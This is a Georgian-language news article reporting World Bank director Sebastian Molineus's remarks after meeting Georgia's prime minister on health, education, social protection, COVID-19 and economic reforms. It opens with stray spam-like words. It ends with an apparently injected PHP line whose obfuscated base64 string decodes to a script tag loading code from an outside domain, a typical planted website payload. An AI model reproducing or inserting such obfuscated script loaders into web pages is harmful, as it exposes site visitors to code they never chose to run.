celsiusi
ავერსი შნაიდერი

მსოფლიო ბანკი საქართველოს მთავრობასთან ერთად ადამიანური კაპიტალის სარეფორმო პროგრამას ამზადებს, - ამის შესახებ მსოფლიო ბანკის რეგიონულმა დირექტორმა სებასტიან მოლინეუსმა საქართველოს პრემიერ-მინისტრ ირაკლი ღარიბაშვილთან გამართული შეხვედრის შემდეგ განაცხადა. ინფორმაციას საქართველოს მთავრობის ადმინისტრაცია ავრცელებს.

მან აღნიშნა, რომ საქართველოში დაგეგმილ თუ მიმდინარე რეფორმებთან მიმართების მსოფლიო ბანკს დიდი მოლოდინები აქვს. მისივე ინფორმაციით, შეხვედრაზე საუბარი ძირითადად 3 მიმართულებით წარიმართა.

„საქართველოს პრემიერ-მინისტრთან შეხვედრისას მთავარი აქცენტი ეკონომიკური რეფორმების პროგრამაზე გაკეთდა. მიხარია, რომ ბევრ მნიშვნელოვან რეფორმას ვხედავ საქართველოში მიმდინარესა თუ დაწყებულს. პირველი მათგანია ადამიანური კაპიტალისდღის წესრიგი, სადაც მსოფლიო ბანკი საქართველოს მთავრობასთან ერთად მსხვილ და ვიტყოდი - გარდამქმნელ სარეფორმო პროგრამას ამზადებს, რომელიც ჯანდაცვის სისტემაში არსებულ მდგომარეობას გააუმჯობესებ. აქ განსაკუთრებით გასათვალისწინებელია მკურნალობასა და მედიკამენტებზე ჯიბიდან გადახდილი თანხები, რაც ქვეყნის ბევრ მოქალაქეს ძალიან ძვირი უჯდება. იგივე მოლოდინია საგანმანათლებლო სფეროში არსებულ ვითარებასთან მიმართებით.

ვიმედოვნებთ, რომ პიზას (PISA) საერთაშორისო რეიტინგში ქვეყანა დაწინაურდება და ადრეული სასკოლოდან საუნივერსიტეტო დონემდე სწავლების ხარისხი გაუმჯობესდება. მესამე მიმართულებაა სოციალური დაცვის მნიშვნელოვანი რეფორმების განხორციელება, რათა მიზნობრიობა დაიხვეწოს და დახმარება ისეთმა ოჯახებმა მიიღონ, ვინც ყველაზე მეტად საჭიროებს მას - თან ბავშვიანმა ოჯახებმა. ეს ადამიანური კაპიტალის დღის წესრიგია. ჩვენი საუბრის პირველი მთავარი თემაც ეს გახლდათ. მეორე საკითხი ახალ კორონავირუსზე რეაგირების ზომები იყო.

მთავრობის მიერ განხორციელებული დადებითი ინიციატივები - მწვანე პასპორტები, ხანდაზმულებისთვის ფინანსური დანამატები უნდა გაგრძელდეს და მძლავრი საკომუნიკაციო და საინფორმაციო კამპანიის საშუალებით გაძლიერდეს. ყოველივე ამის მიზანია მთელი ქვეყნის მოსახლეობის ვაქცინაცია. მესამე საკითხად განვიხილეთ ეკონომიკური და სტრუქტურული რეფორმების დღის წესრიგი. რა რეფორმა უნდა განხორციელდეს ქვეყნის ეკონომიკის პროდუქტიულობის გასაზრდელად, რათა მეტი სამუშაო ადგილი შეიქმნას; კიდევ რა რეფორმაა საჭირო მდგრადი ეკონომიკური ზრდის შესანარჩუნებლად - აქ საუბარი მაქვს კონკრეტულად კლიმატის დღის წესრიგზე. და ბოლოს, რა არის საჭირო ძლიერი, კონკურენტუნარიანი და ციფრული ეკონომიკის უზრუნველსაყოფად საქართველოში.

ბოლო, თუმცა არანაკლებ მნიშვნელოვანი საკითხი ლოგისტიკას ეხებოდა. როდესაც საუბარია რეგიონალურ დაკავშირებადობაზე და ინტეგრაციაზე, საქართველო ძლიერი ლიდერის როლს თამაშობს არა მხოლოდ რეგიონში, არამედ ასევე გლობალურად, რადგან ასეთი გეოპოლიტიკური მდებარეობა გააჩნია აქ, ამ რეგიონში”, - განაცხადა სებასტიან მოლინეუსმა

1248
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");